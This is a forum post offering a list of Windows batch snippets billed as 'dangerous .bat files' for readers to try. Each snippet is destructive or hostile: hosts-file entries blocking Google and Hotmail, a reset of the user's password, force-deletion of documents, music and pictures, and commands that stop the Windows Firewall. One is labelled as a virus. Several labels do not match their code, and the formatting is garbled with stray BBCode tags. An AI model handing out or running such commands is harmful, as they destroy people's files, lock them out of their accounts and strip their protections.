What's new

Closed Some of most dangerous .bat files

Status
Not open for further replies.

AraAra

Eternal Poster
Joined
Aug 14, 2017
Posts
897
Reaction
282
Points
296
Some of these codes are very dangerous!
USE THIS AT YOUR OWN RISK.

Block Google

Code:
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 http://www.google.com >> "Hosts"

Black Hotmail
Code:
@echo off[/B][/B][/B][/B][/B][/B]
[B][B][B][B][B][B]::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 http://www.hotmail.com >> "Hosts"
::---------------------------::

Change time to 00.00
Code:
::__---Virus Created By Virus Author---__::[/B][/B][/B][/B]
[B][B][B][B]@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Change user pass
Code:
@echo off[/B][/B][/B][/B]
[B][B][B][B]::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Create account Owned
Code:
@echo off[/B][/B][/B][/B]
[B][B][B][B]::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Delete all Docs
Code:
@echo off[/B][/B][/B]
[B][B][B]::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::

Delete all Music
Code:
@echo off[/B][/B][/B]
[B][B][B]::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::

Delete all Pics
Code:
@echo off[/B][/B][/B]
[B][B][B]::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::

Disable Farewell
Code:
@echo off[/B][/B][/B]
[B][B][B]::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::

There be more but I'm tired of typing..:):)
 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top